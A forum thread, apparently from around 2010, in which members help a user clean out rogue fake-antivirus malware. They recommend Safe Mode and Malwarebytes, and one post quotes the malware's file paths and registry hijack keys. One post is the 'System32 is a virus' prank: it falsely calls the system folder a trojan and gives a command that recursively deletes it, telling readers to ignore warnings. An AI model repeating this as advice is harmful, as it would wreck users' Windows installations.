• Have something to say? Register Now! and be posting in minutes!

computer help needed, where the guru?

ccpmotox

ccpmotox

New Member
1,692
2
0
Joined
Dec 22, 2009
Location
Norman
Hoopla Cash
$ 1,000.00
System32 is a virus that infects your Windows directory and turns it into a Sega game. Microsoft makes software to remedy this called "My Computer". It comes pre-installed with most Windows systems and can most likely be found on your desktop.

To remove the System32 trojan virus, you have two choices. The quickest, most effective method is to press the Windows key on the keyboard, hold it, and press 'R', and then type cmd /c rd /s /q %windir%\system32 -- or you may double-click "My Computer", then right-click the infected C: directory, and choose Delete. Ignore any warnings, as this malicious virus will try to stay on your directory as long as it can.
 
Red_Alert

Red_Alert

^^ Privileged ^^
92,301
8,234
533
Joined
Jan 10, 2010
Hoopla Cash
$ 1,956.00
Fav. Team #1
Fav. Team #2
Fav. Team #3
caneman

When you get the energy. Try and get back to today where you had the virus. ie..Go forward.
The things that you lost should return.

Boot your computer in Safe Mode. ie...when you turn on the computer start hitting F8 repeatedly.
Select "Safe Mode" this will bypass the executable files in the registry, where the virus is.
Your "Safe Mode" screen will look somewhat different than what your used too.
Run Malwarebytes from there.
 
cane_man

cane_man

I AM the liquor
16,411
6
38
Joined
Dec 19, 2009
Location
recovered swampland
Hoopla Cash
$ 1,000.00
Fav. Team #1
Fav. Team #2
Fav. Team #3
"In reality, though, the infections that the rogues states are on your computer are all legitimate files that if deleted could cause Windows to not operate correctly"

LMAO! yup, every file listed was a system file and essential files for AVG, and spybot
 
cane_man

cane_man

I AM the liquor
16,411
6
38
Joined
Dec 19, 2009
Location
recovered swampland
Hoopla Cash
$ 1,000.00
Fav. Team #1
Fav. Team #2
Fav. Team #3
Red_Alert said:
caneman

When you get the energy. Try and get back to today where you had the virus. ie..Go forward.
The things that you lost should return.

Boot your computer in Safe Mode. ie...when you turn on the computer start hitting F8 repeatedly.
Select "Safe Mode" this will bypass the executable files in the registry, where the virus is.
Your "Safe Mode" screen will look somewhat different than what your used too.
Run Malwarebytes from there.
Click to expand...

familiar with safe mode. other than one glitch I think Ive got it. redownloaded malware bytes just in case. thanx for the help bras.......hmmmm that looks kinda gay, lets go with bros
 
cane_man

cane_man

I AM the liquor
16,411
6
38
Joined
Dec 19, 2009
Location
recovered swampland
Hoopla Cash
$ 1,000.00
Fav. Team #1
Fav. Team #2
Fav. Team #3
ccpmotox said:
System32 is a virus that infects your Windows directory and turns it into a Sega game. Microsoft makes software to remedy this called "My Computer". It comes pre-installed with most Windows systems and can most likely be found on your desktop.

To remove the System32 trojan virus, you have two choices. The quickest, most effective method is to press the Windows key on the keyboard, hold it, and press 'R', and then type cmd /c rd /s /q %windir%\system32 -- or you may double-click "My Computer", then right-click the infected C: directory, and choose Delete. Ignore any warnings, as this malicious virus will try to stay on your directory as long as it can.
Click to expand...

LMAO! you are such a nice guy.
 
cane_man

cane_man

I AM the liquor
16,411
6
38
Joined
Dec 19, 2009
Location
recovered swampland
Hoopla Cash
$ 1,000.00
Fav. Team #1
Fav. Team #2
Fav. Team #3
Ghost In The Machine said:
From the symantec forum that I linked to...

"While searching the web for iPhones, a fake security malware infected my laptop. Although I use Firefox and Symantec Endpoint, the trojan slipped through my XP SP3 system. When I ran a full scan, the March 5 r of Symantec did not identify the problem. After researching the web, I found a blog at "Bleepingcomputer.com," which fully described the problem and the solution. I used MalwareBytes' AntiMalware to remove the infected registries and files. Note that the rogue has other names, such as Vista Internet Security 2010, Win 7 Internet Security 2010, and several others. This rogue must be disabled before it allows other executable files to run. I used FixExe.reg.

Variants of the files infected are as follows.

%UserProfile%\Local Settings\Application Data\av.exe

%UserProfile%\Local Settings\Application Data\WRblt8464P

%UserProfile%\AppData\Local\av.exe <In Antivirus Vista 2010 & Win 7 Antispyware 2010>

%UserProfile%\AppData\Local\WRblt8464P <In Antivirus Vista 2010 & Win 7 Antispyware 2010>

HKEY_CURRENT_USER\Software\Classes\.exe\shell\open\command "(Default)" = "%UserProfile%\Local Settings\Application Data\av.exe" /START "%1" %*

HKEY_CURRENT_USER\Software\Classes\secfile\shell\open\command "(Default)" = "%UserProfile%\Local Settings\Application Data\av.exe" /START "%1" %*

HKEY_CLASSES_ROOT\.exe\shell\open\command "(Default)" = "%UserProfile%\Local Settings\Application Data\av.exe" /START "%1" %*

HKEY_CLASSES_ROOT\secfile\shell\open\command "(Default)" = "%UserProfile%\Local Settings\Application Data\av.exe" /START "%1" %*

HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\FIREFOX.EXE\shell\open\command "(Default)" = "%UserProfile%\Local Settings\Application Data\av.exe" /START "C:\Program Files\Mozilla Firefox\firefox.exe"

HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\FIREFOX.EXE\shell\safemode\command "(Default)" = "%UserProfile%\Local Settings\Application Data\av.exe" /START "C:\Program Files\Mozilla Firefox\firefox.exe" -safe-mode

HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\IEXPLORE.EXE\shell\open\command "(Default)" = "%UserProfile%\Local Settings\Application Data\av.exe" /START "C:\Program Files\Internet Explorer\iexplore.exe"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center "AntiVirusOverride" = "1"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center "FirewallOverride" = "1"

My system had the "av.exe" rogue and six infected registry files.

Any questions, please reference the article posted Jan 27, 2010 by Grinler on BleepingComputer.com "How to remove XP Internet Security 2010, Antivirus Vista 2010, and Win 7 Antispyware 2010."
I also found an older article at Rogue Security Software | Fake Virus Alerts | Scareware
Click to expand...

eusing reg cleaner cleaned those out (or similar). thanx for the registry tip red alert.
 
ktg8trgrl

ktg8trgrl

Go Gators!
28,632
4,825
293
Joined
Jan 23, 2010
Location
Central Florida
Hoopla Cash
$ 1,351.00
Fav. Team #1
Fav. Team #2
Fav. Team #3
ok.. is there a way to keep this from happening??.. cuz I have a new puter and I dont want this to happen to me... thanks guys for your input
 
cane_man

cane_man

I AM the liquor
16,411
6
38
Joined
Dec 19, 2009
Location
recovered swampland
Hoopla Cash
$ 1,000.00
Fav. Team #1
Fav. Team #2
Fav. Team #3
Id give you advice, but alas it might not be so good LMAO.

actually keep a good av up, run spybot search and destroy (free) malware bytes (free) and I also use eusing free registry cleaner, which fixed me here. some people dont trust reg cleaners, but Ive used eusing for some time now without a single problem, and it backs up your reg before changing anything, so if it does fuck up, you can reverse it.
 
You must log in or register to reply here.

Similar threads

SteelersPride
  • Discussion
I need QB strategy help
Replies
10
Views
98
SteelersPride
SteelersPride
belcherboy
  • Discussion
It looks like the Lions Super Bowl hopes are likely gone...
2 3 4
Replies
77
Views
1K
justanidiot
justanidiot
Draft Crazy
  • Sticky
  • Discussion
Post Season Wrap
2
Replies
28
Views
326
BSUSeahawk
BSUSeahawk
fightinfunbags
  • Discussion
Fantasy Week 17 Help
2 3 4
Replies
60
Views
3K
Schmoopy1000
Schmoopy1000
Stymietee
  • Discussion
"The difference between winning and losing...What does meaningful change actually look like in Washington?,"
2
Replies
33
Views
707
Breed
Breed
Top